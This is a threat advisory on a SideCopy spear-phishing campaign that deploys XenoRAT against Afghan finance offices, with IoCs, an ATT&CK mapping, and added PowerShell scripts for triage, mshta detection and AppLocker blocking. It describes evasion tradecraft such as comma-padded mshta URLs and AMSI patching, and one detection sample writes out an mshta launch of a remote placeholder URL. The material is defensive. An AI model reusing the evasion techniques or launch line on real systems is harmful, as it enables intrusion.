Attack Report · Threat Advisory · Amber · June 02, 2026
Operation XENOFISCAL: SideCopy adopts XenoRAT to target Afghan finance
Pakistan-linked APT SideCopy executed a precision spear-phishing campaign against Afghanistan's Ministry of Finance and its 34 provincial revenue directorates, deploying the open-source XenoRAT v1.8.7 remote access trojan through a fileless, multi-stage loader chain.
01 — Summary
What happened
SideCopy — a Pakistan-linked advanced persistent threat cluster also tracked as UNC2269, White Dev 55, Mocking Draco, and TAG-140 — executed Operation XENOFISCAL, a targeted spear-phishing campaign directed at Afghanistan's Ministry of Finance and its provincial revenue and finance directorates across all 34 Mustoufiats. The attack delivered a malicious Windows shortcut (LNK) file inside a ZIP archive, using a Pashto-language lure themed around an intellectual and psychological warfare seminar to deceive provincial finance officials.
Execution of the LNK abused the legitimate Windows binary mshta.exe to kick off a multi-stage, largely fileless loader chain that ultimately deployed XenoRAT v1.8.7 — an open-source remote access trojan. The XenoRAT implant beaconed to bulletproof European hosting infrastructure kept deliberately separate from the Afghan-hosted delivery layer, providing the SideCopy APT with encrypted command-and-control, comprehensive surveillance capability, and long-term persistent access to compromised Windows hosts.
02 — Attack details
How the attack unfolded
Operation XENOFISCAL is a deliberate, intelligence-led operation underpinned by precise knowledge of Afghan administrative structure, a stealthy fileless delivery path, and a surveillance-capable implant engineered for quiet, persistent access.
SideCopy initiated the Operation XENOFISCAL campaign with a targeted spear-phishing message delivering a ZIP archive containing a malicious Windows shortcut (LNK) file. The LNK was disguised with a PDF icon and a carefully crafted Pashto-language filename referencing an employee list for an intellectual and psychological warfare seminar — a lure tailored precisely to provincial finance officials. The level of organisational specificity across all 34 Afghan Mustoufiats indicates prior intelligence gathering by the SideCopy APT group against Afghan government finance targets.
When the victim opens the LNK, it silently launches mshta.exe from System32 and points it at a remote PHP resource on a compromised Afghan education domain (abimj.edu.af). This living-off-the-land binary (LOLBIN) technique runs externally hosted script content in memory without writing an executable to disk. The URL argument was padded with long runs of commas to break static and signature-based matching on the command line. While the chain proceeds in the background, the victim is shown a convincing decoy: an Afghan Ministry of Finance provincial staff directory covering all 34 provinces, written in Dari and Pashto.
The final payload is XenoRAT v1.8.7, an open-source remote access trojan. On execution, XenoRAT opens an encrypted TCP command-and-control channel to a hard-coded IP address and enforces single-instance execution through a mutex named clouda. The implant supports SOCKS5 proxy tunnelling and dynamic in-memory DLL loading through Assembly.Load. Persistence is a scheduled task named XenoUpdateManager registered at the highest available run level; when the implant lacks the rights to create it, it falls back to a Run value named Edgre under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The implant can self-delete through a hidden cmd.exe routine when instructed by the operator.
XenoRAT's post-exploitation capability set is built for comprehensive surveillance and host reconnaissance: keylogging, screen capture, clipboard monitoring, webcam and microphone capture, file upload/download/deletion, antivirus enumeration via WMI, and arbitrary command execution. C2 infrastructure is hosted on bulletproof European servers kept entirely separate from the Afghan-hosted delivery layer, providing operational compartmentalisation and long-term resilience for the SideCopy campaign against Afghan Ministry of Finance targets.
03 — Actor details
SideCopy APT — threat actor profile
SideCopy is a Pakistan-linked advanced persistent threat cluster active since at least 2019, conducting precision spear-phishing campaigns against South Asian government, defence, and finance sectors.
- Attribution — Pakistan-linked
- Active since — 2019
- Targeted regions — Afghanistan (confirmed); South Asia (broader)
- Targeted sectors — Government, Finance, Public administration, Defence
- Known capabilities — Spear-phishing, LOLBIN abuse, fileless loaders, open-source RAT adoption, bulletproof C2 infrastructure
04 — Recommendations
What to do now
Prioritised response actions for security and operations teams. The first action should begin immediately on any suspected host.
On suspected hosts, identify and terminate the running implant process first (the clouda mutex is held while it runs); otherwise it keeps its C2 session until reboot. Then remove the registry value Edgre under HKCU\Software\Microsoft\Windows\CurrentVersion\Run and delete the scheduled task XenoUpdateManager. Inspect and clear the staging directories C:\Users\Public\USOShared-1de48789-1285 and C:\Users\Public\firefx-1de87eec8-1241. Remove residual artifacts: zuidrt.hta, noway.bat, ayui.vmxx, and ayhui.vmxx. Preserve copies and SHA-256 hashes of anything found before deleting it, so the files can be matched against the hashes in section 05 and retained for forensics.
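The following host-triage script is an added example for this action; it is not part of the advisory and is not SideCopy or XenoRAT code. It checks every host artifact the advisory lists (mutex, Run value in each loaded user hive, scheduled task, dropped file names, staging directories, live connections to the C2 addresses), hashes files before touching them, and only deletes when -Remediate is given. It assumes an elevated Windows PowerShell 5.1 session on the suspect host; the finding object layout and the search roots are my own choices.

```powershell
# Added host-triage example for the eradication step above. Not part of the advisory;
# not SideCopy or XenoRAT code. Read-only by default; -Remediate deletes what it finds.
# Assumes an elevated Windows PowerShell 5.1 session on the suspect host.

function New-Finding([string]$Type, [string]$Detail, [bool]$Removed) {
    [pscustomobject]@{ Type = $Type; Detail = $Detail; Removed = $Removed }
}

function Invoke-XenofiscalTriage {
    [CmdletBinding()]
    param([switch]$Remediate)   # default is report-only: nothing is deleted

    # Artifacts taken from the advisory's IoC list (section 05)
    $runValue      = 'Edgre'
    $taskName      = 'XenoUpdateManager'
    $mutexName     = 'clouda'
    $stagingDirs   = @('C:\Users\Public\USOShared-1de48789-1285',
                       'C:\Users\Public\firefx-1de87eec8-1241')
    $artifactNames = @('ugayt.hta', 'zuidrt.hta', 'noway.bat', 'ayui.vmxx', 'ayhui.vmxx',
                       'WayBroad.dll', 'Aotestpass.dll')
    $c2Hosts       = @('185.235.137.106', '103.132.98.224', '103.132.98.226')
    $findings      = @()

    # 1. Single-instance mutex: present only while an implant is running. Checked in the
    #    session-local and Global namespaces (the advisory does not say which is used).
    foreach ($name in @($mutexName, "Global\$mutexName")) {
        $m = $null
        try {
            if ([System.Threading.Mutex]::TryOpenExisting($name, [ref]$m)) {
                $m.Dispose()
                $findings += New-Finding 'Mutex' "$name is held by a running process" $false
            }
        } catch {
            # exists but its ACL denies us: still worth reporting
            $findings += New-Finding 'Mutex' "$name exists but could not be opened: $($_.Exception.Message)" $false
        }
    }

    # 2. HKCU Run fallback, checked in every loaded user hive rather than only the
    #    account running this script (the victim is often not the logged-on admin).
    foreach ($hive in (Get-ChildItem Registry::HKEY_USERS)) {
        $runKey = "Registry::HKEY_USERS\$($hive.PSChildName)\Software\Microsoft\Windows\CurrentVersion\Run"
        $item = Get-ItemProperty -Path $runKey -Name $runValue -ErrorAction SilentlyContinue
        if ($null -eq $item) { continue }
        $removed = $false
        if ($Remediate) { Remove-ItemProperty -Path $runKey -Name $runValue; $removed = $true }
        $findings += New-Finding 'RunValue' "$runKey\$runValue = $($item.$runValue)" $removed
    }

    # 3. Scheduled task registered at the highest run level.
    $task = Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue
    if ($task) {
        $cmd = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        $removed = $false
        if ($Remediate) { Unregister-ScheduledTask -TaskName $taskName -Confirm:$false; $removed = $true }
        $findings += New-Finding 'ScheduledTask' "$taskName [$($task.Principal.RunLevel)] -> $cmd" $removed
    }

    # 4. Dropped files by name, hashed so they can be compared with the SHA-256 IoCs.
    #    Search roots (my choice): the Public profile and every user's Temp directory.
    $usersRoot = Join-Path $env:SystemDrive 'Users'
    $roots = @(Join-Path $usersRoot 'Public') + (Get-ChildItem -LiteralPath $usersRoot -Directory |
              ForEach-Object { Join-Path $_.FullName 'AppData\Local\Temp' })
    foreach ($root in $roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $hits = Get-ChildItem -LiteralPath $root -Recurse -Force -File -ErrorAction SilentlyContinue |
                Where-Object { $artifactNames -contains $_.Name }
        foreach ($f in $hits) {
            $hash = (Get-FileHash -LiteralPath $f.FullName -Algorithm SHA256).Hash
            $removed = $false
            if ($Remediate) { Remove-Item -LiteralPath $f.FullName -Force; $removed = $true }
            $findings += New-Finding 'Artifact' "$($f.FullName) sha256=$hash" $removed
        }
    }

    # 5. Staging directories, removed whole after the per-file pass above.
    foreach ($dir in $stagingDirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        $removed = $false
        if ($Remediate) { Remove-Item -LiteralPath $dir -Recurse -Force; $removed = $true }
        $findings += New-Finding 'StagingDir' $dir $removed
    }

    # 6. Live TCP connections to the C2 addresses; the two -like patterns cover 103.132.98.0/23.
    $conns = Get-NetTCPConnection -ErrorAction SilentlyContinue | Where-Object {
        ($c2Hosts -contains $_.RemoteAddress) -or
        ($_.RemoteAddress -like '103.132.98.*') -or ($_.RemoteAddress -like '103.132.99.*') }
    foreach ($c in $conns) {
        $p = Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue
        $detail = '{0}:{1} <- PID {2} ({3})' -f $c.RemoteAddress, $c.RemotePort, $c.OwningProcess, $p.ProcessName
        $findings += New-Finding 'C2Connection' $detail $false
    }

    return $findings
}

# Usage: report first, remediate only after evidence has been preserved.
Invoke-XenofiscalTriage | Format-Table -AutoSize
# Invoke-XenofiscalTriage -Remediate | Format-Table -AutoSize
```

Run the report-only form first and export the output; the C2Connection findings name the owning process, which is the one to terminate before the Remediate pass so that persistence removal is not undone by a still-running implant.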
Alert on mshta.exe executing with HTTP or HTTPS URL arguments — particularly remote index.php endpoints — and on mshta.exe spawned by explorer.exe or as a child of an LNK execution. This process lineage is the earliest reliable detection point for the Operation XENOFISCAL spear-phishing chain.
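The detection logic below is an added example for this action and for the mshta launch described in section 02; it is not part of the advisory. It collapses the comma padding on the command line so the URL becomes matchable, flags mshta.exe launched with a remote http(s) target or a heavily comma-padded argument, and records an explorer.exe parent and an index.php endpoint as supporting context. The sample records are constructed, with placeholder host names, in the field layout of Sysmon event ID 1; the live query at the end assumes Sysmon is installed under its default log name.

```powershell
# Added detection example for the mshta lineage above. Not part of the advisory.
# Sample records below are constructed (placeholder host names), not real telemetry.

function ConvertTo-NormalisedCommandLine {
    param([string]$CommandLine)
    # Collapse runs of commas and whitespace so the remote URL is visible to the regexes.
    return (($CommandLine -replace '[,\s]+', ' ').Trim())
}

function Test-MshtaRemoteLaunch {
    param(
        [string]$Image,
        [string]$CommandLine,
        [string]$ParentImage = ''
    )
    if (-not $Image -or [IO.Path]::GetFileName($Image).ToLowerInvariant() -ne 'mshta.exe') { return }
    $norm    = ConvertTo-NormalisedCommandLine -CommandLine $CommandLine
    $reasons = @()
    if ($norm -match '(?i)\bhttps?://\S+') { $reasons += "remote script URL $($Matches[0])" }
    if ($CommandLine -match ',{5,}')       { $reasons += 'comma-padded argument' }
    if ($reasons.Count -eq 0) { return }   # a local .hta launch is not flagged on its own
    if ($norm -match '(?i)/index\.php\b')  { $reasons += 'index.php endpoint' }
    if ($ParentImage -and [IO.Path]::GetFileName($ParentImage).ToLowerInvariant() -eq 'explorer.exe') {
        $reasons += 'spawned by explorer.exe (consistent with an LNK double-click)'
    }
    [pscustomobject]@{
        Image                 = $Image
        ParentImage           = $ParentImage
        NormalisedCommandLine = $norm
        Reasons               = ($reasons -join '; ')
    }
}

# Constructed sample records (Sysmon event ID 1 field names). Only the first should fire.
$samples = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = '"C:\Windows\System32\mshta.exe" http://lure.example.invalid/index.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = '"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"' }
    [pscustomobject]@{ Image = 'C:\Program Files\Browser\browser.exe'; ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = '"C:\Program Files\Browser\browser.exe" http://intranet.example.invalid/index.php' }
)

$hits = foreach ($s in $samples) {
    Test-MshtaRemoteLaunch -Image $s.Image -CommandLine $s.CommandLine -ParentImage $s.ParentImage
}
$hits | Format-List

# Live hunt over Sysmon process-creation events (assumes Sysmon with its default log name).
function Get-MshtaRemoteLaunchEvent {
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
    foreach ($ev in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $d = @{}
        foreach ($n in ([xml]$ev.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        Test-MshtaRemoteLaunch -Image $d['Image'] -CommandLine $d['CommandLine'] -ParentImage $d['ParentImage']
    }
}
```

Normalising before matching is the point: a signature written against a literal URL misses the padded form, while a rule that requires mshta.exe plus any http(s) target in the collapsed command line is unaffected by how many commas were appended. The same function can be fed Windows Security event 4688 records where command-line auditing is enabled, substituting NewProcessName and ParentProcessName for the Sysmon field names.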
Build detection content for the loader tradecraft in this XenoRAT chain: RWX memory allocation via VirtualAlloc followed by CreateThread, .NET BinaryFormatter deserialization, AmsiScanBuffer patching, COMPLUS_Version environment-variable manipulation, and reflective Assembly.Load of in-memory payloads.
Deploy WDAC or AppLocker rules to restrict or block execution of mshta.exe and HTA files where not operationally required. Disable or tightly limit Windows Script Host, ActiveX, and legacy Internet Explorer script-host functionality that the JScript loader chain depends on to execute XenoRAT's fileless delivery.
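The script below is an added example for this action and not part of the advisory. It builds an AppLocker Deny rule for both copies of mshta.exe, merges it into the local policy in audit mode, and tests the result. It assumes an elevated session on a Windows SKU that ships AppLocker, with the Application Identity service (AppIDSvc) running; the rule names, the Everyone SID scope and the audit-first choice are my own. Keep the default Allow rules in the Exe collection: a collection holding only a Deny rule blocks every executable.

```powershell
# Added AppLocker hardening example for the action above. Not part of the advisory.
# Assumes an elevated session with AppLocker available and AppIDSvc running.

$mshtaPaths = @('%SYSTEM32%\mshta.exe', '%WINDIR%\SysWOW64\mshta.exe')   # AppLocker path variables

# One Deny rule per binary location, scoped to Everyone (S-1-1-0). Deny wins over Allow.
$denyRules = foreach ($p in $mshtaPaths) {
@"
    <FilePathRule Id="$([guid]::NewGuid())" Name="Deny $p" Description="Operation XENOFISCAL hardening: block HTA and remote script execution" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePathCondition Path="$p" />
      </Conditions>
    </FilePathRule>
"@
}

# AuditOnly first: events are logged as if enforced, nothing is blocked yet.
$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="AuditOnly">
$($denyRules -join "`n")
  </RuleCollection>
</AppLockerPolicy>
"@

$policyPath = Join-Path $env:TEMP 'deny-mshta.xml'
Set-Content -LiteralPath $policyPath -Value $policyXml -Encoding UTF8

Start-Service -Name AppIDSvc -ErrorAction SilentlyContinue   # rules are only evaluated while this runs
Set-AppLockerPolicy -XmlPolicy $policyPath -Merge             # -Merge keeps the existing Allow rules

# Verify: the decision for mshta.exe should now come back as Denied with the new rule matched.
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -Path "$env:SystemRoot\System32\mshta.exe"
```

Review the AppLocker EXE and DLL log for event ID 8003 (would have been blocked) over a normal business cycle before changing EnforcementMode to Enabled, and confirm the resulting collection mode with Get-AppLockerPolicy -Local -Xml, since an existing Exe collection may already carry its own mode. Where a business process genuinely needs HTA, replace the Everyone SID with a group SID that excludes that population rather than dropping the rule.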
05 — Indicators of compromise
IoCs — Operation XENOFISCAL / XenoRAT
Block or monitor all indicators below across network controls, endpoint detection, and SIEM pipelines. All domains and IPs are defanged.
- 194B912C242604D6F9A79369F22338C58A13CE0CC2ED280CE505075808BC2F14
- 3B4194BDFE40D94031A94B30397FFD8A4B09D0A4057668E897B8BDCD1703DD01
- DF9173A28C0B0B878C10A53D35CD7CE6F6ED66D207B6B7C4FF723721F1C027AB
- A63E90EE57A1F213A8FE76EF1A6CFF5AE9ED7EBCEDA258431533825E648C0C67
- 5833917BD137804F5A021D2CB37ADFE5C4B7B67DBB06D59C3B9C5CF393835E45
- 99127C8C67D90E2776BEEB85281F9C68399BF4567B07A6B638D68B760212E88D
- 8F2D979EF33B2900351C94C7335275A9342C75189E1A901998E90A539E944A1A
- 0019212F25EB04BBB33BB194879C095265DB7855D6003BDD777CF0CBB90EB772
- 9AE3D785486022AF82EA92E51B26E3F55C1BBA88A7BE2AD9790F4240E8499D14
- abimj[.]edu[.]af
- 185[.]235[.]137[.]106
- 103[.]132[.]98[.]224
- 103[.]132[.]98[.]226
- 103[.]132[.]98[.]0/23
- hxxp[:]//abimj[.]edu[.]af/index[.]php
- hxxp[:]//abimj[.]edu[.]af/institute/cloudiyaf/document[.]pdf
- hxxp[:]//abimj[.]edu[.]af/institute/cloudiya/
- hxxps[:]//abimj[.]edu[.]af/institute/10/
- hxxps[:]//abimj[.]edu[.]af/institute/7/
- ugayt.hta
- noway.bat
- zuidrt.hta
- WayBroad.dll
- Aotestpass.dll
- ayui.vmxx
- ayhui.vmxx
- C:\Users\Public\USOShared-1de48789-1285\zuidrt.hta
- C:\Users\Public\firefx-1de87eec8-1241
- Mutex — clouda
- Registry — HKCU\Software\Microsoft\Windows\CurrentVersion\Run · value: Edgre
- Scheduled task — XenoUpdateManager
06 — MITRE ATT&CK TTPs
Tactics, techniques & sub-techniques
Mapping of the behaviours described in sections 02 and 04 to MITRE ATT&CK for Enterprise technique IDs:
- T1588.002 Obtain Capabilities: Tool (open-source XenoRAT)
- T1584.001 Compromise Infrastructure: Domains (abimj.edu.af used as delivery host)
- T1566.001 Phishing: Spearphishing Attachment (ZIP containing the LNK)
- T1204.002 User Execution: Malicious File (victim opens the LNK)
- T1036 Masquerading (LNK carrying a PDF icon and document-style filename)
- T1218.005 System Binary Proxy Execution: Mshta
- T1059.007 Command and Scripting Interpreter: JavaScript (JScript loader stages)
- T1059.003 Command and Scripting Interpreter: Windows Command Shell (hidden cmd.exe self-delete routine)
- T1027 Obfuscated Files or Information (comma-padded URL argument)
- T1620 Reflective Code Loading (Assembly.Load of in-memory payloads)
- T1562.001 Impair Defenses: Disable or Modify Tools (AmsiScanBuffer patching)
- T1053.005 Scheduled Task/Job: Scheduled Task (XenoUpdateManager)
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (HKCU Run value Edgre)
- T1047 Windows Management Instrumentation and T1518.001 Software Discovery: Security Software Discovery (antivirus enumeration via WMI)
- T1056.001 Input Capture: Keylogging
- T1113 Screen Capture
- T1115 Clipboard Data
- T1125 Video Capture (webcam)
- T1123 Audio Capture (microphone)
- T1105 Ingress Tool Transfer (file download to the host)
- T1095 Non-Application Layer Protocol and T1573 Encrypted Channel (encrypted TCP C2 to a hard-coded IP)
- T1090 Proxy (SOCKS5 tunnelling)
- T1070.004 Indicator Removal: File Deletion (operator-triggered self-delete)